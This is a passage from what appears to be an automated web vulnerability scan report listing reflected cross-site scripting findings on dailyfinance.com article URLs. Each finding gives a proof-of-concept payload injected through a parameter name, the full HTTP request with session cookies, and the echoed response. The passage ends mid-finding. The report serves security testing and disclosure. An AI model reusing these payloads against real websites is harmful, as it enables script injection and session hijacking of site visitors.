GET /story/investing/why-global-food-price-inflation-really-matters/19827378/?7b125"-alert(1)-"66d1000cc3d=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createEl ...[SNIP]...
1.445. http://www.dailyfinance.com/story/investing/why-global-food-price-inflation-really-matters/19827378/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69239"><script>alert(1)</script>a06145a9627 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/investing/why-global-food-price-inflation-really-matters/19827378/?69239"><script>alert(1)</script>a06145a9627=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/investing/why-global-food-price-inflation-really-matters/19827378/?69239"><script>alert(1)</script>a06145a9627=1" rel="nofollow"> ...[SNIP]...
1.446. http://www.dailyfinance.com/story/media/chaos-in-todays-egypt-sparks-worries-about-its-ancient-past/19828072/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc1b7"-alert(1)-"58bdbb7ac83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/media/chaos-in-todays-egypt-sparks-worries-about-its-ancient-past/19828072/?dc1b7"-alert(1)-"58bdbb7ac83=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.create ...[SNIP]...
1.447. http://www.dailyfinance.com/story/media/chaos-in-todays-egypt-sparks-worries-about-its-ancient-past/19828072/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3284"><script>alert(1)</script>d8208c49c1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/media/chaos-in-todays-egypt-sparks-worries-about-its-ancient-past/19828072/?d3284"><script>alert(1)</script>d8208c49c1a=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/media/chaos-in-todays-egypt-sparks-worries-about-its-ancient-past/19828072/?d3284"><script>alert(1)</script>d8208c49c1a=1" rel="nofollow"> ...[SNIP]...
1.448. http://www.dailyfinance.com/story/media/hulu-gets-stewart-and-colbert-shows-back/19828061/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8764"><script>alert(1)</script>1ec4760cdf5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/media/hulu-gets-stewart-and-colbert-shows-back/19828061/?a8764"><script>alert(1)</script>1ec4760cdf5=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/media/hulu-gets-stewart-and-colbert-shows-back/19828061/?a8764"><script>alert(1)</script>1ec4760cdf5=1" rel="nofollow"> ...[SNIP]...
1.449. http://www.dailyfinance.com/story/media/hulu-gets-stewart-and-colbert-shows-back/19828061/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f867d"-alert(1)-"e457b2427c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/media/hulu-gets-stewart-and-colbert-shows-back/19828061/?f867d"-alert(1)-"e457b2427c2=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createEle ...[SNIP]...
1.450. http://www.dailyfinance.com/story/media/is-piers-morgan-cnns-savior-so-far-at-least-the-answer-is-no/19826242/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b1c0"><script>alert(1)</script>8d6e76d181d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/media/is-piers-morgan-cnns-savior-so-far-at-least-the-answer-is-no/19826242/?6b1c0"><script>alert(1)</script>8d6e76d181d=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/media/is-piers-morgan-cnns-savior-so-far-at-least-the-answer-is-no/19826242/?6b1c0"><script>alert(1)</script>8d6e76d181d=1" rel="nofollow"> ...[SNIP]...
1.451. http://www.dailyfinance.com/story/media/is-piers-morgan-cnns-savior-so-far-at-least-the-answer-is-no/19826242/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32993"-alert(1)-"9e4339663f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/media/is-piers-morgan-cnns-savior-so-far-at-least-the-answer-is-no/19826242/?32993"-alert(1)-"9e4339663f3=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.create ...[SNIP]...
1.452. http://www.dailyfinance.com/story/media/sesame-street-coming-to-new-childrens-museum/19828110/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77fd2"><script>alert(1)</script>1ce12f3df08 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/media/sesame-street-coming-to-new-childrens-museum/19828110/?77fd2"><script>alert(1)</script>1ce12f3df08=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/media/sesame-street-coming-to-new-childrens-museum/19828110/?77fd2"><script>alert(1)</script>1ce12f3df08=1" rel="nofollow"> ...[SNIP]...
1.453. http://www.dailyfinance.com/story/media/sesame-street-coming-to-new-childrens-museum/19828110/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa317"-alert(1)-"5702f94f651 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/media/sesame-street-coming-to-new-childrens-museum/19828110/?aa317"-alert(1)-"5702f94f651=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createEle ...[SNIP]...
1.454. http://www.dailyfinance.com/story/microsoft-denies-copying-google-can-it-compete-in-obscure-searc/19825760/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 564ee"-alert(1)-"07737124683 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/microsoft-denies-copying-google-can-it-compete-in-obscure-searc/19825760/?564ee"-alert(1)-"07737124683=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.create ...[SNIP]...
1.455. http://www.dailyfinance.com/story/microsoft-denies-copying-google-can-it-compete-in-obscure-searc/19825760/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fca6"><script>alert(1)</script>3b4771bb453 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/microsoft-denies-copying-google-can-it-compete-in-obscure-searc/19825760/?5fca6"><script>alert(1)</script>3b4771bb453=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/microsoft-denies-copying-google-can-it-compete-in-obscure-searc/19825760/?5fca6"><script>alert(1)</script>3b4771bb453=1" rel="nofollow"> ...[SNIP]...
1.456. http://www.dailyfinance.com/story/nyse/stocks-finish-week-with-more-gains-after-jobs-data/19828933/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1fdf"><script>alert(1)</script>858158d5057 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/nyse/stocks-finish-week-with-more-gains-after-jobs-data/19828933/?d1fdf"><script>alert(1)</script>858158d5057=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/nyse/stocks-finish-week-with-more-gains-after-jobs-data/19828933/?d1fdf"><script>alert(1)</script>858158d5057=1" rel="nofollow"> ...[SNIP]...
1.457. http://www.dailyfinance.com/story/nyse/stocks-finish-week-with-more-gains-after-jobs-data/19828933/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f56b"-alert(1)-"1ce74119c8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/nyse/stocks-finish-week-with-more-gains-after-jobs-data/19828933/?3f56b"-alert(1)-"1ce74119c8a=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createEl ...[SNIP]...
1.458. http://www.dailyfinance.com/story/raj-patel-value-of-nothing-interview-buddhist-economics/19827037/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 665d2"><script>alert(1)</script>4e9fd2527f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/raj-patel-value-of-nothing-interview-buddhist-economics/19827037/?665d2"><script>alert(1)</script>4e9fd2527f=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/raj-patel-value-of-nothing-interview-buddhist-economics/19827037/?665d2"><script>alert(1)</script>4e9fd2527f=1" rel="nofollow"> ...[SNIP]...
1.459. http://www.dailyfinance.com/story/raj-patel-value-of-nothing-interview-buddhist-economics/19827037/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5b0d"-alert(1)-"4419770cc27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/raj-patel-value-of-nothing-interview-buddhist-economics/19827037/?a5b0d"-alert(1)-"4419770cc27=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.cre ...[SNIP]...
1.460. http://www.dailyfinance.com/story/real-estate/foreclosure-hawaii-supreme-court-nonjudicial-fraud-constitution/19828831/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdc2b"><script>alert(1)</script>03ffb7a18e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/real-estate/foreclosure-hawaii-supreme-court-nonjudicial-fraud-constitution/19828831/?bdc2b"><script>alert(1)</script>03ffb7a18e1=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/real-estate/foreclosure-hawaii-supreme-court-nonjudicial-fraud-constitution/19828831/?bdc2b"><script>alert(1)</script>03ffb7a18e1=1" rel="nofollow"> ...[SNIP]...
1.461. http://www.dailyfinance.com/story/real-estate/foreclosure-hawaii-supreme-court-nonjudicial-fraud-constitution/19828831/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 260de"-alert(1)-"468c282cff4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/real-estate/foreclosure-hawaii-supreme-court-nonjudicial-fraud-constitution/19828831/?260de"-alert(1)-"468c282cff4=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.create ...[SNIP]...
1.462. http://www.dailyfinance.com/story/son-of-former-enron-ceo-jeffrey-skilling-found-dead-in-apartment/19828738/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3f10"-alert(1)-"7e4146b3b1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/son-of-former-enron-ceo-jeffrey-skilling-found-dead-in-apartment/19828738/?c3f10"-alert(1)-"7e4146b3b1b=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createE ...[SNIP]...
1.463. http://www.dailyfinance.com/story/son-of-former-enron-ceo-jeffrey-skilling-found-dead-in-apartment/19828738/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cc17"><script>alert(1)</script>e301719d8f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
